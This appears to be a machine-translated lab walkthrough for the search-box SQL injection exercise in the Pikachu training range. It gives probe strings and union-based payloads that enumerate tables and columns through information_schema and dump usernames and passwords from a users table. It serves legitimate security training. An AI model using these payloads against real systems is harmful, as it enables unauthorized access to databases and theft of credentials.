Pikachu shooting range -SQL Inject - Search injection clearance steps

First of all, understand MySQL Database fuzzy search statement ,like ‘ often %’、like ‘% often ’、like ‘% often %’ These are , I won't go into detail here

Determine the injection point

I don't know how to write code. You can try the following statements

This is about the search injection statement I use ：
v%’ and -1=-1 – bbq

Search type injection statements found on the Internet ：
‘and 1=1 and ‘%’=’

%’ and 1=1–’

%’ and 1=1 and ‘%’=’
An error is reported when the single quotation mark is closed , This probably means %xx%、xx% Well

Go directly to the process diagram , Can't see clearly, click the picture to zoom in ：

Determine how many fields there are

It's closed 4 individual , Move the picture up ：

Show obvious dislocation

Querying the current database

version() Check the database version ,database() View the current database

v%' union select version(),database(),33 -- bbq

Query all tables in the database

If there are many tables, the page display is incomplete , have access to LIMIT Page by page , You can also use group_concat() The splicing function wraps the displayed field names for display

v%' union select table_name,22,33 from information_schema.tables where table_schema=database() -- bbq

Query the column names in the specified table

The next step to query the table name is , The query field is the column name

v%' union select column_name,22,33 from information_schema.columns where table_schema='pikachu' and table_name='users' -- bbq

Query data

After the above steps , Already know the database name 、 Table name 、 Field name , Then we can query the data we need

v%' union select username,password,33 from users -- bbq